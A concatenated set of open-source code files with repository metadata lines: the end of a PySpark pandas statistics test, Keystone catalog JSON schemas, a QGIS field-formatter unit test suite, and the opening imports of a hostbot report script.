pdf.var(ddof=0, numeric_only=True),
check_exact=False,
)
self.assert_eq(psdf.std(numeric_only=True), pdf.std(numeric_only=True), check_exact=False)
self.assert_eq(
psdf.std(ddof=0, numeric_only=True),
pdf.std(ddof=0, numeric_only=True),
check_exact=False,
)
self.assert_eq(psdf.sem(numeric_only=True), pdf.sem(numeric_only=True), check_exact=False)
self.assert_eq(
psdf.sem(ddof=0, numeric_only=True),
pdf.sem(ddof=0, numeric_only=True),
check_exact=False,
)
self.assert_eq(len(psdf.median(numeric_only=True)), len(pdf.median(numeric_only=True)))
self.assert_eq(len(psdf.kurtosis(numeric_only=True)), len(pdf.kurtosis(numeric_only=True)))
self.assert_eq(len(psdf.skew(numeric_only=True)), len(pdf.skew(numeric_only=True)))
# Boolean was excluded because of a behavior change in NumPy
# https://github.com/numpy/numpy/pull/16273#discussion_r641264085 which pandas inherits
# but this behavior is inconsistent in pandas context.
# Boolean column in quantile tests are excluded for now.
# TODO(SPARK-35555): track and match the behavior of quantile to pandas'
pdf = pd.DataFrame({"i": [0, 1, 2], "s": ["x", "y", "z"]})
psdf = ps.from_pandas(pdf)
self.assert_eq(
len(psdf.quantile(q=0.5, numeric_only=True)),
len(pdf.quantile(q=0.5, numeric_only=True)),
)
self.assert_eq(
len(psdf.quantile(q=[0.25, 0.5, 0.75], numeric_only=True)),
len(pdf.quantile(q=[0.25, 0.5, 0.75], numeric_only=True)),
)
def test_numeric_only_unsupported(self):
pdf = pd.DataFrame({"i": [0, 1, 2], "b": [False, False, True], "s": ["x", "y", "z"]})
psdf = ps.from_pandas(pdf)
if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True))
self.assert_eq(
psdf[["i", "b"]].sum(numeric_only=False), pdf[["i", "b"]].sum(numeric_only=False)
)
else:
self.assert_eq(psdf.sum(numeric_only=True), pdf.sum(numeric_only=True).astype(int))
self.assert_eq(
psdf[["i", "b"]].sum(numeric_only=False),
pdf[["i", "b"]].sum(numeric_only=False).astype(int),
)
with self.assertRaisesRegex(TypeError, "Could not convert object \\(string\\) to numeric"):
psdf.sum(numeric_only=False)
with self.assertRaisesRegex(TypeError, "Could not convert object \\(string\\) to numeric"):
psdf.s.sum()
if __name__ == "__main__":
import unittest
from pyspark.pandas.tests.test_stats import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| apache-2.0 |
takeshineshiro/keystone | keystone/catalog/schema.py | 14 | 2387 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystone.common.validation import parameter_types
_region_properties = {
'description': {
'type': ['string', 'null'],
},
# NOTE(lbragstad): Regions use ID differently. The user can specify the ID
# or it will be generated automatically.
'id': {
'type': 'string'
},
'parent_region_id': {
'type': ['string', 'null']
}
}
region_create = {
'type': 'object',
'properties': _region_properties,
'additionalProperties': True
# NOTE(lbragstad): No parameters are required for creating regions.
}
region_update = {
'type': 'object',
'properties': _region_properties,
'minProperties': 1,
'additionalProperties': True
}
_service_properties = {
'enabled': parameter_types.boolean,
'name': parameter_types.name,
'type': {
'type': 'string',
'minLength': 1,
'maxLength': 255
}
}
service_create = {
'type': 'object',
'properties': _service_properties,
'required': ['type'],
'additionalProperties': True,
}
service_update = {
'type': 'object',
'properties': _service_properties,
'minProperties': 1,
'additionalProperties': True
}
_endpoint_properties = {
'enabled': parameter_types.boolean,
'interface': {
'type': 'string',
'enum': ['admin', 'internal', 'public']
},
'region_id': {
'type': 'string'
},
'region': {
'type': 'string'
},
'service_id': {
'type': 'string'
},
'url': parameter_types.url
}
endpoint_create = {
'type': 'object',
'properties': _endpoint_properties,
'required': ['interface', 'service_id', 'url'],
'additionalProperties': True
}
endpoint_update = {
'type': 'object',
'properties': _endpoint_properties,
'minProperties': 1,
'additionalProperties': True
}
| apache-2.0 |
nyalldawson/QGIS | tests/src/python/test_qgsfieldformatters.py | 16 | 30927 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for field formatters.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '05/12/2016'
__copyright__ = 'Copyright 2016, The QGIS Project'
import tempfile
import qgis # NOQA
from qgis.core import (QgsFeature, QgsProject, QgsRelation, QgsVectorLayer,
QgsValueMapFieldFormatter, QgsValueRelationFieldFormatter,
QgsRelationReferenceFieldFormatter, QgsRangeFieldFormatter,
QgsCheckBoxFieldFormatter, QgsFallbackFieldFormatter,
QgsSettings, QgsGeometry, QgsPointXY, QgsVectorFileWriter)
from qgis.PyQt.QtCore import QCoreApplication, QLocale, QVariant
from qgis.testing import start_app, unittest
from utilities import writeShape
start_app()
class TestQgsValueMapFieldFormatter(unittest.TestCase):
VALUEMAP_NULL_TEXT = "{2839923C-8B7D-419E-B84B-CA2FE9B80EC7}"
def test_representValue(self):
QgsSettings().setValue("qgis/nullValue", "NULL")
layer = QgsVectorLayer("none?field=number1:integer&field=number2:double&field=text1:string&field=number3:integer&field=number4:double&field=text2:string",
"layer", "memory")
self.assertTrue(layer.isValid())
QgsProject.instance().addMapLayer(layer)
f = QgsFeature()
f.setAttributes([2, 2.5, 'NULL', None, None, None])
layer.dataProvider().addFeatures([f])
fieldFormatter = QgsValueMapFieldFormatter()
# Tests with different value types occurring in the value map
# old style config (pre 3.0)
config = {'map': {'two': '2', 'twoandhalf': '2.5', 'NULL text': 'NULL',
'nothing': self.VALUEMAP_NULL_TEXT}}
self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), 'two')
self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), 'twoandhalf')
self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), 'NULL text')
# Tests with null values of different types, if value map contains null
self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), 'nothing')
self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), 'nothing')
self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), 'nothing')
# new style config (post 3.0)
config = {'map': [{'two': '2'},
{'twoandhalf': '2.5'},
{'NULL text': 'NULL'},
{'nothing': self.VALUEMAP_NULL_TEXT}]}
self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), 'two')
self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), 'twoandhalf')
self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), 'NULL text')
# Tests with null values of different types, if value map contains null
self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), 'nothing')
self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), 'nothing')
self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), 'nothing')
# Tests with fallback display for different value types
config = {}
self.assertEqual(fieldFormatter.representValue(layer, 0, config, None, 2), '(2)')
self.assertEqual(fieldFormatter.representValue(layer, 1, config, None, 2.5), '(2.50000)')
self.assertEqual(fieldFormatter.representValue(layer, 2, config, None, 'NULL'), '(NULL)')
# Tests with fallback display for null in different types of fields
self.assertEqual(fieldFormatter.representValue(layer, 3, config, None, None), '(NULL)')
self.assertEqual(fieldFormatter.representValue(layer, 4, config, None, None), '(NULL)')
self.assertEqual(fieldFormatter.representValue(layer, 5, config, None, None), '(NULL)')
QgsProject.instance().removeAllMapLayers()
class TestQgsValueRelationFieldFormatter(unittest.TestCase):
def test_representValue(self):
first_layer = QgsVectorLayer("none?field=foreign_key:integer",
"first_layer", "memory")
self.assertTrue(first_layer.isValid())
second_layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
"second_layer", "memory")
self.assertTrue(second_layer.isValid())
QgsProject.instance().addMapLayer(second_layer)
f = QgsFeature()
f.setAttributes([123])
first_layer.dataProvider().addFeatures([f])
f = QgsFeature()
f.setAttributes([123, 'decoded_val'])
second_layer.dataProvider().addFeatures([f])
fieldFormatter = QgsValueRelationFieldFormatter()
# Everything valid
config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'decoded'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), 'decoded_val')
# Code not find match in foreign layer
config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'decoded'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
# Missing Layer
config = {'Key': 'pkid', 'Value': 'decoded'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
# Invalid Layer
config = {'Layer': 'invalid', 'Key': 'pkid', 'Value': 'decoded'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
# Invalid Key
config = {'Layer': second_layer.id(), 'Key': 'invalid', 'Value': 'decoded'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
# Invalid Value
config = {'Layer': second_layer.id(), 'Key': 'pkid', 'Value': 'invalid'}
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '(456)')
QgsProject.instance().removeMapLayer(second_layer.id())
def test_valueToStringList(self):
def _test(a, b):
self.assertEqual(QgsValueRelationFieldFormatter.valueToStringList(a), b)
_test([1, 2, 3], ["1", "2", "3"])
_test("{1,2,3}", ["1", "2", "3"])
_test(['1', '2', '3'], ["1", "2", "3"])
_test('not an array', [])
_test('[1,2,3]', ["1", "2", "3"])
_test('{1,2,3}', ["1", "2", "3"])
_test('{"1","2","3"}', ["1", "2", "3"])
_test('["1","2","3"]', ["1", "2", "3"])
_test(r'["a string,comma","a string\"quote", "another string[]"]', ['a string,comma', 'a string"quote', 'another string[]'])
def test_expressionRequiresFormScope(self):
res = list(QgsValueRelationFieldFormatter.expressionFormAttributes("current_value('ONE') AND current_value('TWO')"))
res = sorted(res)
self.assertEqual(res, ['ONE', 'TWO'])
res = list(QgsValueRelationFieldFormatter.expressionFormVariables("@current_geometry"))
self.assertEqual(res, ['current_geometry'])
self.assertFalse(QgsValueRelationFieldFormatter.expressionRequiresFormScope(""))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("current_value('TWO')"))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("current_value ( 'TWO' )"))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresFormScope("@current_geometry"))
self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("", QgsFeature()))
self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("@current_geometry", QgsFeature()))
self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'TWO' )", QgsFeature()))
layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
"layer", "memory")
self.assertTrue(layer.isValid())
QgsProject.instance().addMapLayer(layer)
f = QgsFeature(layer.fields())
f.setAttributes([1, 'value'])
point = QgsGeometry.fromPointXY(QgsPointXY(123, 456))
f.setGeometry(point)
self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("current_geometry", f))
self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'TWO' )", f))
self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'pkid' )", f))
self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("@current_geometry current_value ( 'pkid' )", f))
QgsProject.instance().removeMapLayer(layer.id())
def test_expressionRequiresParentFormScope(self):
res = list(QgsValueRelationFieldFormatter.expressionFormAttributes("current_value('ONE') AND current_parent_value('TWO')"))
res = sorted(res)
self.assertEqual(res, ['ONE'])
res = list(QgsValueRelationFieldFormatter.expressionParentFormAttributes("current_value('ONE') AND current_parent_value('TWO')"))
res = sorted(res)
self.assertEqual(res, ['TWO'])
res = list(QgsValueRelationFieldFormatter.expressionParentFormVariables("@current_parent_geometry"))
self.assertEqual(res, ['current_parent_geometry'])
self.assertFalse(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope(""))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("current_parent_value('TWO')"))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("current_parent_value ( 'TWO' )"))
self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("@current_parent_geometry"))
class TestQgsRelationReferenceFieldFormatter(unittest.TestCase):
def test_representValue(self):
first_layer = QgsVectorLayer("none?field=foreign_key:integer",
"first_layer", "memory")
self.assertTrue(first_layer.isValid())
second_layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
"second_layer", "memory")
self.assertTrue(second_layer.isValid())
QgsProject.instance().addMapLayers([first_layer, second_layer])
f = QgsFeature()
f.setAttributes([123])
first_layer.dataProvider().addFeatures([f])
f = QgsFeature()
f.setAttributes([123, 'decoded_val'])
second_layer.dataProvider().addFeatures([f])
relMgr = QgsProject.instance().relationManager()
fieldFormatter = QgsRelationReferenceFieldFormatter()
rel = QgsRelation()
rel.setId('rel1')
rel.setName('Relation Number One')
rel.setReferencingLayer(first_layer.id())
rel.setReferencedLayer(second_layer.id())
rel.addFieldPair('foreign_key', 'pkid')
self.assertTrue(rel.isValid())
relMgr.addRelation(rel)
# Everything valid
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), 'decoded_val')
# Code not find match in foreign layer
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '456')
# Invalid relation id
config = {'Relation': 'invalid'}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
# No display expression
config = {'Relation': rel.id()}
second_layer.setDisplayExpression(None)
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
# Invalid display expression
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('invalid +')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
# Missing relation
config = {}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
# Inconsistent layer provided to representValue()
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(second_layer, 0, config, None, '123'), '123')
# Inconsistent idx provided to representValue()
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 1, config, None, '123'), '123')
# Invalid relation
rel = QgsRelation()
rel.setId('rel2')
rel.setName('Relation Number Two')
rel.setReferencingLayer(first_layer.id())
rel.addFieldPair('foreign_key', 'pkid')
self.assertFalse(rel.isValid())
relMgr.addRelation(rel)
config = {'Relation': rel.id()}
second_layer.setDisplayExpression('decoded')
self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
QgsProject.instance().removeAllMapLayers()
class TestQgsRangeFieldFormatter(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
QCoreApplication.setOrganizationName("QGIS_Test")
QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsColorScheme.com")
QCoreApplication.setApplicationName("QGIS_TestPyQgsColorScheme")
QgsSettings().clear()
QLocale.setDefault(QLocale(QLocale.English))
start_app()
@classmethod
def tearDownClass(cls):
"""Reset locale"""
QLocale.setDefault(QLocale(QLocale.English))
def test_representValue(self):
layer = QgsVectorLayer("point?field=int:integer&field=double:double&field=long:long",
"layer", "memory")
self.assertTrue(layer.isValid())
QgsProject.instance().addMapLayers([layer])
fieldFormatter = QgsRangeFieldFormatter()
# Precision is ignored for integers and longlongs
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '123000'), '123,000')
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'), '9,999,999') # no scientific notation for integers!
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123,000')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9,999,999') # no scientific notation for long longs!
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 1}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 1}, None, '123'), '123.0')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123,000.00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0'), '0.00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123'), '123.00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.123'), '0.12')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.127'), '0.13')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0'), '0.000')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0.127'), '0.127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '1.27e-1'), '0.127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-123'), '-123.00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.123'), '-0.12')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.127'), '-0.13')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-0.127'), '-0.127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-1.27e-1'), '-0.127')
# Check with Italian locale
QLocale.setDefault(QLocale('it'))
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'),
'9.999.999') # scientific notation for integers!
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123.000')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9.999.999') # scientific notation for long longs!
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123.000,00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0'), '0,00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123'), '123,00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.123'), '0,12')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.127'), '0,13')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0'), '0,000')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0.127'), '0,127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '1.27e-1'), '0,127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-123'), '-123,00')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.123'), '-0,12')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.127'), '-0,13')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-0.127'), '-0,127')
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-1.27e-1'), '-0,127')
# Check with custom locale without thousand separator
custom = QLocale('en')
custom.setNumberOptions(QLocale.OmitGroupSeparator)
QLocale.setDefault(custom)
self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'),
'9999999') # scientific notation for integers!
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123000')
self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9999999') # scientific notation for long longs!
self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123000.00')
QgsProject.instance().removeAllMapLayers()
class TestQgsCheckBoxFieldFormatter(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
QCoreApplication.setOrganizationName("QGIS_Test")
QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsCheckBoxFieldFormatter.com")
QCoreApplication.setApplicationName("QGIS_TestPyQgsCheckBoxFieldFormatter")
QgsSettings().clear()
start_app()
def test_representValue(self):
null_value = "NULL"
QgsSettings().setValue("qgis/nullValue", null_value)
layer = QgsVectorLayer("point?field=int:integer&field=str:string", "layer", "memory")
self.assertTrue(layer.isValid())
field_formatter = QgsCheckBoxFieldFormatter()
# test with integer
# normal case
self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 1), 'true')
self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 0), 'false')
self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 10), "(10)")
# invert true/false
self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 1, 'CheckedState': 0}, None, 0), 'true')
self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 1, 'CheckedState': 0}, None, 1), 'false')
# test with string
self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'yeah'), 'true')
self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'nooh'), 'false')
self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'oops'), "(oops)")
class TestQgsFallbackFieldFormatter(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
QCoreApplication.setOrganizationName("QGIS_Test")
QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsFieldFormatter.com")
QCoreApplication.setApplicationName("QGIS_TestPyQgsFieldFormatter")
QgsSettings().clear()
QLocale.setDefault(QLocale(QLocale.English))
start_app()
@classmethod
def tearDownClass(cls):
"""Reset locale"""
QLocale.setDefault(QLocale(QLocale.English))
def test_representValue(self):
def _test(layer, is_gpkg=False):
# Skip fid and precision tests
offset = 1 if is_gpkg else 0
fieldFormatter = QgsFallbackFieldFormatter()
QLocale.setDefault(QLocale('en'))
# Precision is ignored for integers and longlongs
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '123000'), '123,000')
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'), '9,999,999')
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123000'), '123,000')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9,999,999')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123.00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123,000.00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123,000')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0'), '0')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0.127'), '0.127')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '1.27e-1'), '0.127')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123.00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-0.127'), '-0.127')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-1.27e-1'), '-0.127')
# Check with Italian locale
QLocale.setDefault(QLocale('it'))
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'),
'9.999.999') # scientific notation for integers!
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123000'), '123.000')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9.999.999')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, None), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123.000,00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123.000')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0'), '0')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123,00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0.127'), '0,127')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '1.27e-1'), '0,127')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123,00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-0.127'), '-0,127')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-1.27e-1'), '-0,127')
# Check with custom locale without thousand separator
custom = QLocale('en')
custom.setNumberOptions(QLocale.OmitGroupSeparator)
QLocale.setDefault(custom)
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'),
'9999999') # scientific notation for integers!
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9999999')
if not is_gpkg:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123000.00000')
else:
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123000')
# Check string
self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, '123'), '123')
self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, 'a string'), 'a string')
self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, ''), '')
self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, None), 'NULL')
# Check NULLs (this is what happens in real life inside QGIS)
self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
memory_layer = QgsVectorLayer("point?field=int:integer&field=double:double&field=long:long&field=string:string",
"layer", "memory")
self.assertTrue(memory_layer.isValid())
_test(memory_layer)
# Test a shapefile
shape_path = writeShape(memory_layer, 'test_qgsfieldformatters.shp')
shapefile_layer = QgsVectorLayer(shape_path, 'test', 'ogr')
self.assertTrue(shapefile_layer.isValid())
_test(shapefile_layer)
gpkg_path = tempfile.mktemp('.gpkg')
# Test a geopackage
_, _ = QgsVectorFileWriter.writeAsVectorFormat(
memory_layer,
gpkg_path,
'utf-8',
memory_layer.crs(),
'GPKG',
False,
[],
[],
False
)
gpkg_layer = QgsVectorLayer(gpkg_path, 'test', 'ogr')
self.assertTrue(gpkg_layer.isValid())
# No precision here
_test(gpkg_layer, True)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
jtmorgan/hostbot | top_1000_report.py | 1 | 10578 | #! /usr/bin/env python
from datetime import datetime, timedelta
import hb_config
import json
import pandas as pd
